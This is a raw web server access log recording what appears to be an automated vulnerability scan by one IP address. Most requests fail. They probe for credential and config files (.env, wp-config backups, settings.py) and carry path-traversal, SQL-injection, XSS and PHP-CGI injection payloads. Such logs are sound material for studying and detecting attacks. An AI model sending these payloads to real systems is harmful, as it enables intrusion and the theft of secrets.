195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:34:32 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:34:33 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:34:33 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:34:33 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:34:33 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:34:43 +0000] PUT /2niOjDjIsyPNrApwd9FFnkXbZVE.json HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:19:34:45 +0000] GET /2niOjDjIsyPNrApwd9FFnkXbZVE.json HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:34:48 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:34:50 +0000] GET /_debugbar/open HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:34:56 +0000] GET /solr/admin/cores?wt=json HTTP/1.1 404 1098
jk3spp.xff"> - - [20/Oct/2024:19:35:00 +0000] GET /?d9htbi=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:35:01 +0000] GET /?d9htbi=1 HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:19:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:35:51 +0000] GET /api/.env HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:35:54 +0000] GET /.env HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:35:54 +0000] GET /.env.bak HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:35:54 +0000] GET /.env.dev HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:35:54 +0000] GET /.env.dev.local HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:35:54 +0000] GET /.env.development.local HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.prod HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.prod.local HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.production HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.production.local HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.local HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.example HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:35:55 +0000] GET /.env.stage HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.live HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.backup HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.save HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.old HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.www HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env_1 HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env_sample HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:35:56 +0000] GET /.env.iopan HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:35:57 +0000] GET /.env.sdc HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:19:36:21 +0000] GET /%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:36:23 +0000] GET /%c0%ae/%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1137
195.164.49.69 - - [20/Oct/2024:19:36:24 +0000] GET /../../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:24 +0000] GET /../../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:24 +0000] GET /../../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:24 +0000] GET /%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:36:24 +0000] GET /%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /../../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /../../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /../WEB-INF/web.xml;x= HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /.//WEB-INF/web.xml HTTP/1.1 404 1047
195.164.49.69 - - [20/Oct/2024:19:36:25 +0000] GET /../WEB-INF/web.xml HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:36:31 +0000] POST /WS/Basic/Basic.asmx HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:36:33 +0000] POST /OA/PM/svc.asmx HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:36:35 +0000] GET /Server/CmxUser.php?pgid=UserList HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:36:37 +0000] GET /csz-cms/plugin/article/search?p=3D1%27%22)%20AND%20(SELECT%203910%20FROM%20(SELECT(SLEEP(6)))qIap)--%20ogLS HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:36:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:36:59 +0000] POST /Org/service/Service.asmx/GetUserByEmployeeCode HTTP/1.1 404 1132
195.164.49.69 - - [20/Oct/2024:19:37:01 +0000] POST /index.php?mnu=login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:37:23 +0000] POST /MUP/ HTTP/1.1 404 1082
83.212.98.101 - - [20/Oct/2024:19:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:37:45 +0000] GET /UploadService/Page/ HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:37:47 +0000] POST /direct/polling/CommandsPolling.php HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:19:38:08 +0000] POST /search HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:38:10 +0000] POST /general/file_folder/swfupload_new.php HTTP/1.1 404 1119
195.164.49.69 - - [20/Oct/2024:19:38:19 +0000] GET /_wpeprivate/config.json HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:38:43 +0000] GET /.wp-config.php.swp HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:49 +0000] GET /wp-config.php HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config-sample.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config.inc HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config.old HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config.txt HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config.php.txt HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:52 +0000] GET /wp-config.php.bak HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.BAK HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.old HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.OLD HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.dist HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.inc HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.swp HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config.php.html HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:53 +0000] GET /wp-config-backup.txt HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php.save HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php.SAVE HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php~ HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php-backup HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php.orig HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php_orig HTTP/1.1 404 1092
195.164.49.69 - - [20/Oct/2024:19:38:54 +0000] GET /wp-config.php.original HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:38:55 +0000] GET /wp-config.backup HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:39:08 +0000] GET /config.php.zip HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:39:14 +0000] GET /config.php.tar.gz HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:39:15 +0000] GET /config.php.new HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:39:16 +0000] GET /common/config.php.new HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:19:39:16 +0000] GET /wp-config.php.bk HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:39:16 +0000] GET /home/iopanWORDPRESS.txt HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:39:16 +0000] GET /home/iopan-WORDPRESS.txt HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:39:21 +0000] GET /ebvp/infopub/show_download_content;.js?id=1';WAITFOR+DELAY+'0:0:6'-- HTTP/1.1 404 1120
195.164.49.69 - - [20/Oct/2024:19:40:15 +0000] GET /index.php?content=../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:40:36 +0000] GET /sysaid/getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:40:38 +0000] GET /getGfiUpgradeFile?fileName=../../../../../../../etc/passwd HTTP/1.1 404 1091
83.212.98.101 - - [20/Oct/2024:19:40:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:41:19 +0000] GET /XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:41:40 +0000] GET /glpi/plugins/barcode/front/send.php?file=../../../../../../../../etc/passwd HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:19:42:02 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:42:24 +0000] GET /monitoring?part=graph&graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:42:26 +0000] GET /client/cdnfile/1C/Windows/win.ini?windows HTTP/1.1 404 1123
83.212.98.101 - - [20/Oct/2024:19:42:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:42:28 +0000] GET /client/cdnfile/C/etc/passwd?linux HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:19:42:30 +0000] GET /wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:19:42:51 +0000] GET /druid/index.html HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:42:53 +0000] GET /install.php HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:42:55 +0000] GET /setup/index.php HTTP/1.1 404 1093
- - - [20/Oct/2024:19:42:57 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:42:59 +0000] GET /file?valore=../../../../../windows/win.ini HTTP/1.1 404 1078
195.164.49.69 - - [20/Oct/2024:19:43:21 +0000] GET /api/users/search_authors HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:43:23 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:43:25 +0000] GET /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10 HTTP/1.1 404 1157
195.164.49.69 - - [20/Oct/2024:19:43:47 +0000] GET /install.php?profile=default HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:43:48 +0000] GET /core/install.php HTTP/1.1 404 1094
195.164.49.69 - - [20/Oct/2024:19:43:51 +0000] GET /?q=%27%3E%22%3Csvg%2Fonload=confirm%28%27q%27%29%3E&s=%27%3E%22%3Csvg%2Fonload=confirm%28%27s%27%29%3E&search=%27%3E%22%3Csvg%2Fonload=confirm%28%27search%27%29%3E&id=%27%3E%22%3Csvg%2Fonload=confirm%28%27id%27%29%3E&action=%27%3E%22%3Csvg%2Fonload=confirm%28%27action%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27keyword%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27query%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27page%27%29%3E&keywords=%27%3E%22%3Csvg%2Fonload=confirm%28%27keywords%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27url%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27view%27%29%3E&cat=%27%3E%22%3Csvg%2Fonload=confirm%28%27cat%27%29%3E&name=%27%3E%22%3Csvg%2Fonload=confirm%28%27name%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27key%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27p%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:43:52 +0000] GET /?api=%27%3E%22%3Csvg%2Fonload=confirm%28%27api%27%29%3E&api_key=%27%3E%22%3Csvg%2Fonload=confirm%28%27api_key%27%29%3E&begindate=%27%3E%22%3Csvg%2Fonload=confirm%28%27begindate%27%29%3E&callback=%27%3E%22%3Csvg%2Fonload=confirm%28%27callback%27%29%3E&categoryid=%27%3E%22%3Csvg%2Fonload=confirm%28%27categoryid%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27csrf_token%27%29%3E&email=%27%3E%22%3Csvg%2Fonload=confirm%28%27email%27%29%3E&emailto=%27%3E%22%3Csvg%2Fonload=confirm%28%27emailto%27%29%3E&enddate=%27%3E%22%3Csvg%2Fonload=confirm%28%27enddate%27%29%3E&immagine=%27%3E%22%3Csvg%2Fonload=confirm%28%27immagine%27%29%3E&item=%27%3E%22%3Csvg%2Fonload=confirm%28%27item%27%29%3E&jsonp=%27%3E%22%3Csvg%2Fonload=confirm%28%27jsonp%27%29%3E&l=%27%3E%22%3Csvg%2Fonload=confirm%28%27l%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27lang%27%29%3E&list_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27list_type%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:43:54 +0000] GET /?month=%27%3E%22%3Csvg%2Fonload=confirm%28%27month%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27page_id%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27password%27%29%3E&terms=%27%3E%22%3Csvg%2Fonload=confirm%28%27terms%27%29%3E&token=%27%3E%22%3Csvg%2Fonload=confirm%28%27token%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27type%27%29%3E&unsubscribe_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27unsubscribe_token%27%29%3E&year=%27%3E%22%3Csvg%2Fonload=confirm%28%27year%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:43:57 +0000] GET /downloadfile.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:44:19 +0000] GET /download.php?file=/etc/passwd HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:44:40 +0000] GET /spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:19:44:42 +0000] GET /nuovo/spreadsheet-reader/test.php?File=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1115
195.164.49.69 - - [20/Oct/2024:19:45:23 +0000] GET /views..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cProgramData%5cRepetier-Server%5cdatabase%5cuser.sql%20/base/connectionLost.php HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:45:45 +0000] GET /configuration.yml HTTP/1.1 404 1091
83.212.98.101 - - [20/Oct/2024:19:45:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:45:46 +0000] GET /config/configuration.yml HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:45:48 +0000] GET /redmine/config/configuration.yml HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:19:45:50 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:45:53 +0000] GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:19:45:55 +0000] GET /wp-content/plugins/issuu-panel/menu/documento/requests/ajax-docs.php?abspath=%2Fetc%2Fpasswd HTTP/1.1 404 1166
195.164.49.69 - - [20/Oct/2024:19:46:16 +0000] GET /config/databases.yml HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:46:18 +0000] GET /auth.json HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:46:20 +0000] GET /manage.py HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:46:22 +0000] GET /settings.py HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:46:24 +0000] GET /app/settings.py HTTP/1.1 404 1093
195.164.49.69 - - [20/Oct/2024:19:46:26 +0000] GET /django/settings.py HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:46:28 +0000] GET /settings/settings.py HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:46:30 +0000] GET /web/settings/settings.py HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:19:46:34 +0000] GET /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:46:56 +0000] GET /index.php?page=../../../../../../../../../../etc/passwd HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:47:18 +0000] GET /index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
83.212.98.101 - - [20/Oct/2024:19:47:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:19:47:38 +0000] GET /index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:48:01 +0000] GET /servlets/FetchFile?fileName=../../../etc/passwd HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:48:23 +0000] GET /sftp.json HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:48:25 +0000] GET /.config/sftp.json HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:48:27 +0000] GET /.vscode/sftp.json HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:48:29 +0000] GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20substring(sys.fn_sqlvarbasetostr(hashbytes('MD5','999999999')),3,32) HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:19:48:31 +0000] GET /Api/portal/elementEcodeAddon/getSqlData?sql HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:19:48:33 +0000] GET /.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:48:35 +0000] GET /api/setup-complete HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:48:37 +0000] GET /.drone.yml HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:48:39 +0000] GET /.remote-sync.json HTTP/1.1 404 1091
195.164.49.69 - - [20/Oct/2024:19:48:41 +0000] GET /i/?rid HTTP/1.1 404 1080
195.164.49.69 - - [20/Oct/2024:19:48:43 +0000] GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:19:49:05 +0000] GET /downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:49:27 +0000] GET /admin/?page=teams/view_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:49:29 +0000] GET /sftp-config.json HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:49:30 +0000] GET /ftpsync.settings HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:19:49:32 +0000] GET /web/admin/setup HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:19:49:34 +0000] GET /../../../../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:49:36 +0000] GET /wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:49:37 +0000] GET /admin/?page=teams/manage_team&id=1'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:49:39 +0000] GET /setup.php HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:49:41 +0000] GET /Pic/Indexs?imgs=DJwkiEm6KXJZ7aEiGyN4Cz83Kn1PLaKA09 HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:49:43 +0000] GET /tarantella/cgi-bin/secure/ttawlogin.cgi/?action=start&pg=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:19:49:44 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:49:47 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:49:48 +0000] GET /wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:49:50 +0000] GET /./../../../../../../../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:49:52 +0000] GET /go/add-on/business-continuity/api/plugin?folderName&pluginName=../../../etc/passwd HTTP/1.1 404 1130
195.164.49.69 - - [20/Oct/2024:19:49:54 +0000] GET /res/../admin/diagnostic.jsp HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:49:56 +0000] GET /.well-known/acme-challenge/../../admin/diagnostic.jsp HTTP/1.1 404 1147
195.164.49.69 - - [20/Oct/2024:19:49:58 +0000] GET /update/../admin/diagnostic.jsp HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:19:50:00 +0000] GET /install/ HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:50:02 +0000] GET ///////../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:50:03 +0000] GET /static///////../../../../etc/passwd HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:50:05 +0000] GET ///../app.js HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:19:50:07 +0000] GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1 404 1151
195.164.49.69 - - [20/Oct/2024:19:50:09 +0000] GET /_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1 HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:19:50:11 +0000] GET /wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:50:13 +0000] GET /admin/install/server HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:19:50:14 +0000] GET /setup/ HTTP/1.1 404 1084
195.164.49.69 - - [20/Oct/2024:19:50:16 +0000] GET /download.action?filename=../../../../../../etc/passwd HTTP/1.1 404 1089
195.164.49.69 - - [20/Oct/2024:19:50:18 +0000] GET /s/2niOjG7XtRiKxY6zJA5YkXeCnak/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml HTTP/1.1 404 1209
195.164.49.69 - - [20/Oct/2024:19:50:20 +0000] GET /s/2niOjG7XtRiKxY6zJA5YkXeCnak/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1 404 1197
195.164.49.69 - - [20/Oct/2024:19:50:22 +0000] GET /advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:19:50:24 +0000] GET /_config HTTP/1.1 404 1081
195.164.49.69 - - [20/Oct/2024:19:50:26 +0000] GET /installer HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:19:50:27 +0000] GET /?c=../../../../../../etc/passwd%00 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:19:50:29 +0000] GET /badging/badge_print_v0.php?tpl=../../../../../etc/passwd HTTP/1.1 404 1104
195.164.49.69 - - [20/Oct/2024:19:50:31 +0000] GET /live_mfg.shtml HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:19:50:33 +0000] POST /wp-json/igd/v1/get-users-data HTTP/1.1 404 1115
- - - [20/Oct/2024:19:50:35 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:19:50:37 +0000] GET null HTTP/1.1 400 2308
- - - [20/Oct/2024:19:50:38 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:19:50:40 +0000] GET /install/?step=1 HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:19:50:43 +0000] GET /setup HTTP/1.1 404 1079
83.212.98.101 - - [20/Oct/2024:19:50:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:19:50:45 +0000] GET /install/index.php HTTP/1.1 404 1095
195.164.49.69 - - [20/Oct/2024:19:50:47 +0000] GET /install/make-config.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:19:50:49 +0000] GET /%20../web-inf/ HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:19:50:51 +0000] GET /downlot.php?file=../../../../../../../../../../etc/passwd HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:50:53 +0000] GET /mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b936913*935522%7d HTTP/1.1 404 1161
195.164.49.69 - - [20/Oct/2024:19:50:55 +0000] GET /data/plugins_listing HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:19:50:56 +0000] GET /_ignition/scripts/--%3E%3Csvg%20onload=alert%28document.domain%29%3E HTTP/1.1 404 1150
195.164.49.69 - - [20/Oct/2024:19:50:58 +0000] GET /index.dhtml?sponsor=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1085
195.164.49.69 - - [20/Oct/2024:19:51:03 +0000] POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 404 1083
